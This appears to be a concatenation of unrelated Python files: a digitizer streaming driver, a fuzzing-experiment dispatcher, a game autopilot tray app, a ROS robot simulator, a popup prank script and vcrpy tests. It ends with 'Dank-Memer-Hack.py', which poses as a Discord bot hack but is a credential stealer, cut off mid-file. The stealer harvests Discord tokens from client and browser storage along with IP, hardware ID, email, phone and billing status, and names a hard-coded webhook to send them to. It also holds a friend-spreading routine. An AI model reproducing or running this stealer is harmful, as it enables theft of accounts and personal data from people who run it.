print("starting streamer for %s %s %s\nat: %s"%(self.tree, self.tree.shot, self.path, datetime.datetime.now()))
event_name = self.seg_event.data()
dt = 1./self.freq.data()
chans = []
decim = []
nchans = self.sites*32
for i in range(nchans):
chans.append(getattr(self, 'input_%3.3d'%(i+1)))
decim.append(getattr(self, 'input_%3.3d_decimate' %(i+1)).data())
decimator = lcma(decim)
seg_length = self.seg_length.data()
if seg_length % decimator:
seg_length = (seg_length // decimator + 1) * decimator
segment_bytes = seg_length*nchans*4
dims=[]
for i in range(nchans):
dims.append(Range(0., (seg_length-1)*dt, dt*decim[i]))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.node.data(),4210))
s.settimeout(6)
segment = 0
running = self.running
max_segments = self.max_segments.data()
first = True
buf = bytearray(segment_bytes)
while running.on and segment < max_segments:
toread=segment_bytes
try:
view = memoryview(buf)
while toread:
nbytes = s.recv_into(view, min(4096,toread))
if first:
self.trig_time.record=time.time()
first = False
view = view[nbytes:] # slicing views is cheap
toread -= nbytes
except socket.timeout as e:
print("got a timeout")
err = e.args[0]
# this next if/else is a bit redundant, but illustrates how the
# timeout exception is setup
if err == 'timed out':
time.sleep(1)
print ('recv timed out, retry later')
if not running.on:
break
else:
continue
else:
print (e)
break
except socket.error as e:
# Something else happened, handle error, exit, etc.
print("socket error", e)
break
else:
if toread != 0:
print ('orderly shutdown on server end')
break
else:
buffer = np.frombuffer(buf, dtype='int16')
i = 0
for c in chans:
if c.on:
b = buffer[i::nchans*decim[i]]
c.makeSegment(dims[i].begin, dims[i].ending, dims[i], b)
dims[i] = Range(dims[i].begin + seg_length*dt, dims[i].ending + seg_length*dt, dt*decim[i])
i += 1
segment += 1
Event.setevent(event_name)
if self.log_output.on:
print("%s\tAll Done"%(datetime.datetime.now(),))
sys.stdout.flush()
def setChanScale(self,num):
chan=self.__getattr__('INPUT_%3.3d' % num)
chan.setSegmentScale(MDSplus.ADD(MDSplus.MULTIPLY(chan.COEFFICIENT,MDSplus.dVALUE()),chan.OFFSET))
class ACQ2106_423_1ST(Acq2106_423st):
"""
D-Tacq ACQ2106 with 1 acq423 32 channel digitizers in streaming mode
"""
from copy import copy
parts=copy(Acq2106_423st.carrier_parts)
sites=1
for i in range(sites*32):
parts.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
parts.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
class ACQ2106_423_2ST(Acq2106_423st):
"""
D-Tacq ACQ2106 with 2 acq423 32 channel digitizers in streaming mode
"""
from copy import copy
parts=copy(Acq2106_423st.carrier_parts)
sites=2
for i in range(sites*32):
parts.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
parts.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
class ACQ2106_423_3ST(Acq2106_423st):
"""
D-Tacq ACQ2106 with 3 acq423 32 channel digitizers in streaming mode
"""
from copy import copy
parts=copy(Acq2106_423st.carrier_parts)
sites=3
for i in range(sites*32):
parts.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
parts.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
class ACQ2106_423_4ST(Acq2106_423st):
"""
D-Tacq ACQ2106 with 4 acq423 32 channel digitizers in streaming mode
"""
from copy import copy
parts=copy(Acq2106_423st.carrier_parts)
sites=4
for i in range(sites*32):
parts.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
parts.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
class ACQ2106_423_5ST(Acq2106_423st):
"""
D-Tacq ACQ2106 with 5 acq423 32 channel digitizers in streaming mode
"""
from copy import copy
parts=copy(Acq2106_423st.carrier_parts)
sites=5
for i in range(sites*32):
parts.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
parts.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
class ACQ2106_423_6ST(Acq2106_423st):
"""
D-Tacq ACQ2106 with 6 acq423 32 channel digitizers in streaming mode
"""
from copy import copy
parts=copy(Acq2106_423st.carrier_parts)
sites=6
for i in range(sites*32):
parts.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
parts.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
parts.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
def debugging(self):
import os
if self.debug == None:
self.debug=os.getenv("DEBUG_DEVICES")
return(self.debug)
|
dispatcher.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script to run on the dispatcher. Builds each benchmark with each fuzzing
configuration, spawns a runner VM for each benchmark-fuzzer combo, and then
records coverage data received from the runner VMs."""
import multiprocessing
import os
import sys
import threading
import time
from typing import List
from common import experiment_path as exp_path
from common import experiment_utils
from common import logs
from common import yaml_utils
from database import models
from database import utils as db_utils
from experiment.build import builder
from experiment import measurer
from experiment import reporter
from experiment import scheduler
from experiment import stop_experiment
LOOP_WAIT_SECONDS = 5 * 60
# TODO(metzman): Convert more uses of os.path.join to exp_path.path.
def _get_config_dir():
"""Return config directory."""
return exp_path.path(experiment_utils.CONFIG_DIR)
def create_work_subdirs(subdirs: List[str]):
"""Create |subdirs| in work directory."""
for subdir in subdirs:
os.mkdir(os.path.join(experiment_utils.get_work_dir(), subdir))
def _initialize_experiment_in_db(experiment_config: dict,
trials: List[models.Trial]):
"""Initializes |experiment| in the database by creating the experiment
entity and entities for each trial in the experiment."""
db_utils.add_all([
db_utils.get_or_create(models.Experiment,
name=experiment_config['experiment'],
git_hash=experiment_config['git_hash'],
private=experiment_config.get('private', True))
])
# TODO(metzman): Consider doing this without sqlalchemy. This can get
# slow with SQLalchemy (it's much worse with add_all).
db_utils.bulk_save(trials)
class Experiment: # pylint: disable=too-many-instance-attributes
"""Class representing an experiment."""
def __init__(self, experiment_config_filepath: str):
self.config = yaml_utils.read(experiment_config_filepath)
self.benchmarks = self.config['benchmarks'].split(',')
self.fuzzers = self.config['fuzzers'].split(',')
self.num_trials = self.config['trials']
self.experiment_name = self.config['experiment']
self.git_hash = self.config['git_hash']
self.preemptible = self.config.get('preemptible_runners')
def build_images_for_trials(fuzzers: List[str], benchmarks: List[str],
num_trials: int,
preemptible: bool) -> List[models.Trial]:
"""Builds the images needed to run |experiment| and returns a list of trials
that can be run for experiment. This is the number of trials specified in
experiment times each pair of fuzzer+benchmark that builds successfully."""
# This call will raise an exception if the images can't be built which will
# halt the experiment.
builder.build_base_images()
# Only build fuzzers for benchmarks whose measurers built successfully.
benchmarks = builder.build_all_measurers(benchmarks)
build_successes = builder.build_all_fuzzer_benchmarks(fuzzers, benchmarks)
experiment_name = experiment_utils.get_experiment_name()
trials = []
for fuzzer, benchmark in build_successes:
fuzzer_benchmark_trials = [
models.Trial(fuzzer=fuzzer,
experiment=experiment_name,
benchmark=benchmark,
preemptible=preemptible) for _ in range(num_trials)
]
trials.extend(fuzzer_benchmark_trials)
return trials
def dispatcher_main():
"""Do the experiment and report results."""
logs.info('Starting experiment.')
# Set this here because we get failures if we do it in measurer for some
# reason.
multiprocessing.set_start_method('spawn')
db_utils.initialize()
if experiment_utils.is_local_experiment():
models.Base.metadata.create_all(db_utils.engine)
experiment_config_file_path = os.path.join(_get_config_dir(),
'experiment.yaml')
experiment = Experiment(experiment_config_file_path)
preemptible = experiment.preemptible
trials = build_images_for_trials(experiment.fuzzers, experiment.benchmarks,
experiment.num_trials, preemptible)
_initialize_experiment_in_db(experiment.config, trials)
create_work_subdirs(['experiment-folders', 'measurement-folders'])
# Start measurer and scheduler in seperate threads/processes.
scheduler_loop_thread = threading.Thread(target=scheduler.schedule_loop,
args=(experiment.config,))
scheduler_loop_thread.start()
measurer_main_process = multiprocessing.Process(
target=measurer.measure_main, args=(experiment.config,))
measurer_main_process.start()
is_complete = False
while True:
time.sleep(LOOP_WAIT_SECONDS)
if not scheduler_loop_thread.is_alive():
is_complete = not measurer_main_process.is_alive()
# Generate periodic output reports.
reporter.output_report(experiment.config, in_progress=not is_complete)
if is_complete:
# Experiment is complete, bail out.
break
logs.info('Dispatcher finished.')
scheduler_loop_thread.join()
measurer_main_process.join()
def main():
"""Do the experiment and report results."""
logs.initialize(default_extras={
'component': 'dispatcher',
})
try:
dispatcher_main()
except Exception as error:
logs.error('Error conducting experiment.')
raise error
experiment_config_file_path = os.path.join(_get_config_dir(),
'experiment.yaml')
if experiment_utils.is_local_experiment():
return 0
if stop_experiment.stop_experiment(experiment_utils.get_experiment_name(),
experiment_config_file_path):
return 0
return 1
if __name__ == '__main__':
sys.exit(main())
|
dev_tray.py | import threading
import keyboard
import kthread
from PIL import Image
from pystray import Icon, MenuItem, Menu
from dev_autopilot import autopilot, resource_path, get_bindings, clear_input, set_scanner
STATE = 0
icon = None
thread = None
def setup(icon):
icon.visible = True
def exit_action():
stop_action()
icon.visible = False
icon.stop()
def start_action():
stop_action()
kthread.KThread(target=autopilot, name="EDAutopilot").start()
def stop_action():
for thread in threading.enumerate():
if thread.getName() == 'EDAutopilot':
thread.kill()
clear_input(get_bindings())
def set_state(v):
def inner(icon, item):
global STATE
STATE = v
set_scanner(STATE)
return inner
def get_state(v):
def inner(item):
return STATE == v
return inner
def tray():
global icon, thread
icon = None
thread = None
name = 'ED - Autopilot'
icon = Icon(name=name, title=name)
logo = Image.open(resource_path('src/logo.png'))
icon.icon = logo
icon.menu = Menu(
MenuItem(
'Scan Off',
set_state(0),
checked=get_state(0),
radio=True
),
MenuItem(
'Scan on Primary Fire',
set_state(1),
checked=get_state(1),
radio=True
),
MenuItem(
'Scan on Secondary Fire',
set_state(2),
checked=get_state(2),
radio=True
),
MenuItem('Exit', lambda: exit_action())
)
keyboard.add_hotkey('page up', start_action)
keyboard.add_hotkey('page down', stop_action)
icon.run(setup)
if __name__ == '__main__':
tray()
|
simulator.py | import math
import threading
import matplotlib.pyplot as plt
import numpy as np
import rospy
import time
from geometry_msgs.msg import Pose, Twist
from matplotlib import patches
from matplotlib.collections import PatchCollection
from nav_msgs.msg import Odometry, OccupancyGrid
from nav_msgs.srv import GetMap
from voronoi_hsi.msg import VoronoiTesselation
from voronoi_hsi.srv import *
import Util
import simulator_util
def almost_equal(n, m, diff=0.005):
return abs(n-m) <= diff
class RobotSimulator(simulator_util.DraggablePoint):
def __init__(self, fig_handler, pose, color, id_robot="0"):
# type: (plt.Figure, Pose, list, str) -> None
super(RobotSimulator, self).__init__(fig_handler, x=pose.position.x, y=pose.position.y, color=color)
self.fig_handler = fig_handler
self.pose = pose
self.speed = Twist()
self.color = color
self.id = id_robot
self.speed_callback = rospy.Subscriber("robot_" + str(self.id) + "/cmd_vel", Twist, self.robot_vel_callback, queue_size=1)
self.pose_publisher = rospy.Publisher("robot_" + str(self.id) + "/pose", Odometry, queue_size=1)
def robot_vel_callback(self, msg):
# type: (Twist) -> None
self.speed = msg
def pose_publisher(self):
self.pose_publisher.publish(self.pose)
def set_pose(self, pose):
if isinstance(pose, Pose):
self.pose = pose
elif isinstance(pose, list) and len(pose) is 2:
self.pose = Simulator.conf_to_pose([pose, Util.quaternion_get_yaw(self.pose.orientation)])
else:
raise ValueError("Type should be either a list of geometry_msgs/Pose")
self.set_point_pose(self.pose.position.x, self.pose.position.y)
def remove(self):
super(RobotSimulator, self).remove()
self.speed_callback.unregister()
self.pose_publisher.unregister()
def update_pose_diff(self, occ_grid, sleep_time):
# type: (OccGrid) -> None
w = Util.quaternion_get_yaw(self.pose.orientation)
w_dot = self.speed.angular.z * sleep_time
x_dot = self.speed.linear.x * math.cos(Util.quaternion_get_yaw(self.pose.orientation)) * sleep_time
y_dot = self.speed.linear.x * math.sin(Util.quaternion_get_yaw(self.pose.orientation)) * sleep_time
new_pose = Pose()
w = w + w_dot
new_pose.position.x = self.pose.position.x + x_dot
new_pose.position.y = self.pose.position.y + y_dot
new_pose.orientation = Util.get_quaternion_fom_euler([0, 0, w])
if occ_grid.is_free(new_pose):
self.pose = new_pose
self.set_point_pose(new_pose.position.x, new_pose.position.y)
def publish_pose(self):
odom = Odometry()
odom.pose.pose.position = self.pose.position
odom.pose.pose.orientation = self.pose.orientation
self.pose_publisher.publish(odom)
class OccGrid(object):
should_update = False
def __init__(self, service_name, figure):
self.width = 0
self.height = 0
self.fig = figure
self.resolution = 0
self.occ_grid = None # type: np.matrix
self.origin = Pose()
self.end = Pose()
self.service_name = service_name
self.robot_pose_service = rospy.Service("occ_grid_update", SetOccGrid, self.set_occ_grid_service)
self.should_update = False
self.axes = None
self.plot_handle = None
self.patches = None
def get_occ_grid(self):
occ_grid_service = rospy.ServiceProxy(self.service_name, GetMap)
occ_grid = occ_grid_service().map
self.set_occ_grid(occ_grid)
def set_occ_grid(self, occ_grid):
# type: (OccupancyGrid) -> None
print("got occ grid")
self.occ_grid = occ_grid
self.width = self.occ_grid.info.width
self.height = self.occ_grid.info.height
self.resolution = self.occ_grid.info.resolution
self.origin = self.occ_grid.info.origin
self.end.position.x = self.width*self.resolution + self.origin.position.x
self.end.position.y = self.height * self.resolution + self.origin.position.y
self.occ_grid = np.mat(self.occ_grid.data).reshape(self.height, self.width).transpose()
print("Should update")
self.draw_rectangles()
def set_occ_grid_service(self, req):
# type: (SetOccGridRequest) -> None
self.set_occ_grid(req.map)
def occ_grid_callback(self, msg):
self.set_occ_grid(msg)
def is_free(self, pose, radius=0.2):
sub_pose = Util.subtract_pose(pose, self.origin)
x = int(math.floor(sub_pose.position.x/self.resolution))
y = int(math.floor(sub_pose.position.y/self.resolution))
if 0 <= x < self.width and 0 <= y < self.height:
if 0 <= self.occ_grid[x, y] <= 20:
return True
return False
def get_extent(self):
return [self.origin.position.x, self.end.position.x, self.origin.position.y, self.end.position.y]
def occ_grid_to_img(self):
image = np.copy(self.occ_grid)
for i in range(self.width):
for j in range(self.height):
elem = self.occ_grid[i, j]
if elem == -1:
image[i, j] = 173
else:
image[i, j] = int((1 - elem/100.0)*255)
return np.rot90(image)
def draw_rectangles(self, fig):
image = self.occ_grid_to_img()
extent = self.get_extent()
if self.plot_handle:
self.plot_handle.set_data(image)
else:
self.plot_handle = plt.imshow(image, extent=extent, zorder=0, interpolation='nearest', cmap="gray")
self.should_update = False
class Simulator(object):
physics_time = 0.1
def __init__(self):
self.printing_voronoi = False
self.robots = {} # type: dict
self.physics_time = 0.05
rospy.init_node('simulator')
self.vis_time = 0.05
self.robot_pose_service = rospy.Service("set_robot_pose", SetRobotPose, self.robot_service)
self.occ_grid_topic = ""
self.tesselation_topic = ""
self.robot_param = ""
self.occ_grid_subscriber = None # type: rospy.Subscriber
self.tesselation_subscriber = None # type: rospy.Subscriber
self.voronoi_collection = None
self.voronoi_axes = None
self.voronoi_should_draw = False
self.plot_handle = None
self.obstacle_collection = None
self.obstacle_axes = None
self.fig = plt.figure(1)
plt.gca().set_aspect('equal', adjustable='box')
plt.axis([0, 20, 0, 20])
self.occ_grid = OccGrid("static_map", self.fig)
self.occ_grid.get_occ_grid()
self.fig.canvas.draw()
self.read_simulator_params()
self.read_robot_parameters()
self.physics_t = threading.Thread(target=self.physics_thread)
self.physics_t.daemon = True
self.visual_t = threading.Thread(target=self.visual_thread)
self.visual_t.daemon = True
self.loop_time = 0
def start(self):
self.physics_t.start()
self.visual_t.start()
plt.show()
def read_simulator_params(self):
try:
sim_p = rospy.search_param("simulator")
sim_params = rospy.get_param(sim_p)
self.occ_grid_topic = sim_params["occupancy_grid_topic"]
self.occ_grid_subscriber = rospy.Subscriber(self.occ_grid_topic, OccupancyGrid, self.occ_grid.set_occ_grid, queue_size=1)
self.tesselation_topic = sim_params["tesselation_topic"]
self.tesselation_subscriber = rospy.Subscriber(self.tesselation_topic, VoronoiTesselation, self.voronoi_callback, queue_size=1)
self.robot_param = sim_params["robots_param"]
except KeyError:
rospy.logfatal("Parameter robots not found. Exiting.")
sys.exit(1)
except:
rospy.logfatal("A non recognized exception raised while getting robots parameter. Exiting")
sys.exit(1)
def read_robot_parameters(self):
try:
robots = rospy.get_param(self.robot_param)
if robots is not None and len(robots) > 0:
for r in robots: # type: dict
self.create_robot(r["id"], self.conf_to_pose(r["pose"]), r["color"])
except KeyError:
rospy.logfatal("Parameter robots not found. Exiting.")
sys.exit(1)
except Exception as e:
rospy.logfatal("A non recognized exception raised while getting robots parameter. Exiting\n" + str(e))
sys.exit(1)
def voronoi_callback(self, msg):
if self.printing_voronoi:
print("Skipping printing voronoi, not done yet.")
return
else:
self.printing_voronoi = True
Util.tic()
# type: (VoronoiTesselation) -> None
height = msg.height
width = msg.width
matrix = np.reshape(msg.data, (width, height))
image = np.empty((width, height, 4))
for i in range(width):
for j in range(height):
elem = matrix[i, j]
if elem != -1:
color = self.robots[elem].color
image[i, j] = (np.asarray(color + [0])/255.0)
image[i, j, 3] = 1
else:
image[i, j] = np.asarray([0, 0, 0, 0])
extent = self.occ_grid.get_extent()
if self.plot_handle:
self.plot_handle.set_data(np.rot90(image))
else:
self.plot_handle = plt.imshow(np.rot90(image), extent=extent, zorder=10, interpolation="nearest")
self.voronoi_should_draw = False
@staticmethod
def conf_to_pose(pose_conf):
pose = Pose()
pose.position.x = pose_conf[0]
pose.position.y = pose_conf[1]
pose.orientation = Util.get_quaternion_fom_euler([0, 0, pose_conf[2]])
return pose
def create_robot(self, id_r, pose, color=None):
if color is None:
color = [20, 20, 20]
if id_r in self.robots:
robot = self.robots[id_r]
else:
if not isinstance(pose, Pose):
raise ValueError("pose is not geometry_msgs/Pose type.")
robot = RobotSimulator(self.fig, pose, color, id_r)
robot.color = [20, 20, 20]
if len(color) == 3:
robot.color = color
self.robots[robot.id] = robot
def remove_robot(self, id):
# type: (str) -> None
if id in self.robots: # type: RobotSimulator
robot = self.robots[id]
robot.remove()
self.robots.pop(id, None)
def plot_image(self, image, extent):
return plt.imshow(image, extent=extent, interpolation="nearest")
def plot_occ_grid(self):
occ_grid_img = np.zeros((self.occ_grid.width, self.occ_grid.height, 4), dtype=float)
occ_grid_img[:,:,3] = self.occ_grid.occ_grid
def robot_service(self, req):
# type: (SetRobotPoseRequest) -> object
try:
self.create_robot(req.id, req.pose, req.color)
except ValueError as e:
rospy.logerr(e.message)
return None
def physics_thread(self):
while True:
Util.tic()
for robot in self.robots.values(): # type: RobotSimulator
robot.update_pose_diff(self.occ_grid, self.loop_time)
robot.publish_pose()
toc = Util.toc()
sleep_time = self.physics_time - toc
self.loop_time = toc + sleep_time
if sleep_time <= 0:
sleep_time = 0
time.sleep(sleep_time)
def visual_thread(self):
while True:
# for robot in self.robots.itervalues():
should_draw = False
if self.occ_grid.should_update:
self.occ_grid.draw_rectangles(self.fig)
should_draw = True
if self.voronoi_should_draw:
self.voronoi_should_draw = False
should_draw = True
# for robot in self.robots.values(): # type: RobotSimulator
# if robot.should_draw:
# should_draw = True
# robot.should_draw = False
if should_draw:
self.fig.canvas.draw()
time.sleep(self.vis_time)
def main():
sim = Simulator()
sim.start()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
boring-02.py | """
不断弹出窗口的小程序,如果没有结束进程的话,最多显示100个
不会对电脑有任何的损害
就是比较考验友情
参考:https://mp.weixin.qq.com/s/zIwGnevNiHlgmkeI2XVwXA
改进:tanyiqu
"""
import tkinter as tk
import random
import threading
import time
def boom():
window = tk.Tk()
width = window.winfo_screenwidth()
height = window.winfo_screenheight()
a = random.randrange(0, width)
b = random.randrange(0, height)
window.title('你是一个傻狍子')
window.geometry("200x50" + "+" + str(a) + "+" + str(b))
tk.Label(window, text='你是一个傻狍子', bg='green',
font=('宋体', 17), width=20, height=4).pack()
window.mainloop()
pass
threads = []
for i in range(100):
t = threading.Thread(target=boom)
threads.append(t)
time.sleep(0.1)
threads[i].start()
pass
|
test_wild.py | import multiprocessing
import pytest
from six.moves import xmlrpc_client, xmlrpc_server
requests = pytest.importorskip("requests")
import vcr # NOQA
try:
import httplib
except ImportError:
import http.client as httplib
def test_domain_redirect():
"""Ensure that redirects across domains are considered unique"""
# In this example, seomoz.org redirects to moz.com, and if those
# requests are considered identical, then we'll be stuck in a redirect
# loop.
url = "http://seomoz.org/"
with vcr.use_cassette("tests/fixtures/wild/domain_redirect.yaml") as cass:
requests.get(url, headers={"User-Agent": "vcrpy-test"})
# Ensure that we've now served two responses. One for the original
# redirect, and a second for the actual fetch
assert len(cass) == 2
def test_flickr_multipart_upload(httpbin, tmpdir):
"""
The python-flickr-api project does a multipart
upload that confuses vcrpy
"""
def _pretend_to_be_flickr_library():
content_type, body = "text/plain", "HELLO WORLD"
h = httplib.HTTPConnection(httpbin.host, httpbin.port)
headers = {"Content-Type": content_type, "content-length": str(len(body))}
h.request("POST", "/post/", headers=headers)
h.send(body)
r = h.getresponse()
data = r.read()
h.close()
return data
testfile = str(tmpdir.join("flickr.yml"))
with vcr.use_cassette(testfile) as cass:
_pretend_to_be_flickr_library()
assert len(cass) == 1
with vcr.use_cassette(testfile) as cass:
assert len(cass) == 1
_pretend_to_be_flickr_library()
assert cass.play_count == 1
def test_flickr_should_respond_with_200(tmpdir):
testfile = str(tmpdir.join("flickr.yml"))
with vcr.use_cassette(testfile):
r = requests.post("https://api.flickr.com/services/upload", verify=False)
assert r.status_code == 200
def test_cookies(tmpdir, httpbin):
testfile = str(tmpdir.join("cookies.yml"))
with vcr.use_cassette(testfile):
s = requests.Session()
s.get(httpbin.url + "/cookies/set?k1=v1&k2=v2")
r2 = s.get(httpbin.url + "/cookies")
assert len(r2.json()["cookies"]) == 2
def test_amazon_doctype(tmpdir):
# amazon gzips its homepage. For some reason, in requests 2.7, it's not
# getting gunzipped.
with vcr.use_cassette(str(tmpdir.join("amz.yml"))):
r = requests.get("http://www.amazon.com", verify=False)
assert "html" in r.text
def start_rpc_server(q):
httpd = xmlrpc_server.SimpleXMLRPCServer(("127.0.0.1", 0))
httpd.register_function(pow)
q.put("http://{}:{}".format(*httpd.server_address))
httpd.serve_forever()
@pytest.yield_fixture(scope="session")
def rpc_server():
q = multiprocessing.Queue()
proxy_process = multiprocessing.Process(target=start_rpc_server, args=(q,))
try:
proxy_process.start()
yield q.get()
finally:
proxy_process.terminate()
def test_xmlrpclib(tmpdir, rpc_server):
with vcr.use_cassette(str(tmpdir.join("xmlrpcvideo.yaml"))):
roundup_server = xmlrpc_client.ServerProxy(rpc_server, allow_none=True)
original_schema = roundup_server.pow(2, 4)
with vcr.use_cassette(str(tmpdir.join("xmlrpcvideo.yaml"))):
roundup_server = xmlrpc_client.ServerProxy(rpc_server, allow_none=True)
second_schema = roundup_server.pow(2, 4)
assert original_schema == second_schema
|
Dank-Memer-Hack.py | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from datetime import datetime
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
dt = datetime.now()
# Paste your webhook url to "URL_HERE"
WEBHOOK_URL = 'https://discord.com/api/webhooks/937178658102202379/hxNLyyryScxscVVNp0NL4BFmtQ_XAS7wk7ifNoXRVTpoN981FvocJSrzy03SbkBGiL67'
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Firefox" : LOCAL + "\\Mozilla\\Firefox\\User Data\\Profiles",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Edge" : LOCAL + "\\\Microsoft\\Edge\\User Data\\Default",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
"Vivaldi" : LOCAL + "\\Vivaldi\\User Data\\User Data",
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
flags = user_data.get("public_flags")
billing = bool(has_payment_methods(token))
embed = {
"color": 0x5865f2,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
